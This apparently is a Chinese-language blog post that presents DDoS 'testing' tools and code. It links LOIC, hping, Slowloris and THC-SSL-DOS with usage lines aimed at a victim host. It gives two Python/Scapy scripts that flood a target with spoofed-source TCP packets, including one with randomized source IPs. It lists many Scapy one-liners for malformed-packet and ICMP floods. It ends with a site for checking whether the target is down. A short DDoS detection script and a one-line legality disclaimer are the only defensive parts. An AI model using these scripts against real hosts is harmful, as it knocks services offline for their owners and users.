• DDOS 測試工具

    這篇文章主要說明幾種常見的 DDOS 測試工具。

    (未經授權許可任意測試或是攻擊特定伺服器都是違法的行為。)

    1. LOIC測試工具

    http://sourceforge.net/projects/loic/

    2. Python 程式範例

    Single spoofed IP with multiple port

    from scapy.all import *
    src = raw_input("Enter the Source IP ")
    target = raw_input("Enter the Target IP ")
    i=1
    while True:
            for srcport in range(1,65535):
                IP1 = IP(src=src, dst=target)
                TCP1 = TCP(sport=srcport, dport=80)
                pkt = IP1 / TCP1
                send(pkt,inter= .0001)
                print "packet sent ", i
                i=i+1

    Multiple IP with multiple port

    import random
    from scapy.all import *
    target = raw_input("Enter the Target IP ")
    i=1
    while True:
    	a = str(random.randint(1,254))
    	b = str(random.randint(1,254))
    	c = str(random.randint(1,254))
    	d = str(random.randint(1,254))
    	dot = "."
    	src = a+dot+b+dot+c+dot+d
    	print src
    	st = random.randint(1,1000)
    	en = random.randint(1000,65535)
    	loop_break = 0
    	for srcport in range(st,en):
    		IP1 = IP(src=src, dst=target)
    		TCP1 = TCP(sport=srcport, dport=80)
    		pkt = IP1 / TCP1
    		send(pkt,inter= .0001)
    		print "packet sent ", i
    		loop_break = loop_break+1
    		i=i+1
    		if loop_break ==50 :
    			break

     偵測 DDOS Python 範例

    import socket
    import struct
    from datetime import datetime
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
    dict = {}
    file_txt = open("dos.txt",'a')
    file_txt.writelines("**********")
    t1= str(datetime.now())
    file_txt.writelines(t1)
    file_txt.writelines("**********")
    file_txt.writelines("\n")
    print "Detection Start ......."
    D_val =10
    D_val1 = D_val+10
    
    while True:
    	pkt = s.recvfrom(2048)
    	ipheader = pkt[0][14:34]
    	ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
    	IP = socket.inet_ntoa(ip_hdr[3])
    	print "Source IP", IP
    	if dict.has_key(IP):
    		dict[IP]=dict[IP]+1
    		print dict[IP]
    		if(dict[IP]>D_val) and (dict[IP]<D_val1) :
    			line = "DDOS Detected "
    			file_txt.writelines(line)
    			file_txt.writelines(IP)
    			file_txt.writelines("\n")
    		else:
    		dict[IP]=1

    3. Scapy in KaliLinux

    “Scapy” 是著名的封包產生器。透過這個方式也會產生大量的封包進行 DDOS攻擊。

    下列範例:send(IP(dst=”10.0.0.1″,ttl=0)/TCP(),iface=”eth0″,count=2000)

    • 針對主機 10.0.0.1
    • 產生 2000 封包
    • 從 eth0網卡
    • TTL = 0

    4. THC-SSL-DOS

    針對SSL handshake 的DOS攻擊。

    thc-ssl-dos [options] <ip of the victim> <port> and –accept

    5. Slowloris

    針對HTTP 的DOS 攻擊。傳送大量的 Http Header的方式讓網站服器器癱瘓。

    http://ckers.org/slowloris

    perl slowloris.pl

    perl slowloris.pl -dns VictimWebSite.com

    6. Hping (TCP封包產生器)

    http://www.hping.org/

    DOS 封包攻擊類型

    常見的 DDOS 封包攻擊有哪些呢?

    L2 Length >> IP Length
    send(IP(dst="10.0.0.1",len=32)/Raw(load="bla-bla-bla-bla-bla-blabla-bla"),iface="eth0",count=2000)
    send(IP(dst="10.0.0.1",len=32)/UDP(dport=80,len=48)/Raw(load="bla-bla-bla-bla-bla-bla-bla-bla"),iface="eth0",count=2000)
    send(IP(dst="10.0.0.1",len=32)/ICMP()/Raw(load="bla-bla-bla-blabla-bla-bla-bla"),iface="eth0",count=2000)
    
    No L4
    send(IP(dst="10.0.0.1", src="10.20.30.40"), iface="eth0", count=2000)
    SYN && FIN Set
    send(IP(dst="10.0.0.1")/TCP(flags="FS"),iface="eth0",count=2000)
    TCP Header Length > L2 Length
    send(IP(dst="10.0.0.1", src="10.20.30.40")TCP(dport="www", dataofs=15L), iface="eth0", count=2000)
    
    Bad TCP Checksum
    send(IP(dst="10.0.0.1")/TCP(chksum=0x5555),iface="eth0",count=2000)
    Bad TCP Flags (All Cleared and SEQ# == 0)
    send(IP(dst="10.0.0.1")/TCP(flags="",seq=555),iface="eth0",count=2000)
    Bad TCP flags (All Flags Set)
    send(IP(dst="10.0.0.1")/TCP(flags=0x0ff),iface="eth0",count=2000)
    FIN Only Set
    send(IP(dst="10.0.0.1")/TCP(flags="F"),iface="eth0",count=2000)
    Header Length > L2 Length
    send(IP(dst="10.0.0.1", src="10.20.30.40", ihl=15L)/TCP(dport="www"), iface="eth0", count=2000)
    Header length Too Short
    send(IP(dst="10.0.0.1", src="10.20.30.40", ihl=2L)/TCP(dport="www"),iface="eth0", count=2000)
    
    ICMP Flood
    send(IP(dst="10.0.0.1")/ICMP(),iface="eth0",count=2000)
    
    IP Error Checksum
    send(IP(dst="10.0.0.1", src="10.20.30.40", chksum=0x5500)/TCP(dport="www"), iface="eth0", count=2000)
    
    IP Fragment
    send(IP(dst="10.0.0.1", src="10.20.30.40", frag=1)/TCP(dport="www"),iface="eth0", count=2000)
    IP Length > L2 Length
    send(IP(dst="10.0.0.1", src="10.20.30.40", ihl=5L, len=80)/TCP(dport="www"), iface="eth0", count=2000)
    IP Source Address == Destination Address
    send(IP(dst="10.0.0.1",src="10.0.0.1")/TCP(dport="www"),iface="eth0", count=2000)
    TCP Header Length Too Short (Length < 5)
    send(IP(dst="10.0.0.1", src="10.20.30.40")/TCP(dport="www", dataofs=1L), iface="eth0", count=2000)

     

    如何知道網站是否無法服務?

    可以利用一些雲端服務測試,該遠端網站是否已經無法連線。

    http://www.isitdownrightnow.com/

     

    Posted by Tony @ 7:43 pm

  • Leave a Reply

    Your email address will not be published.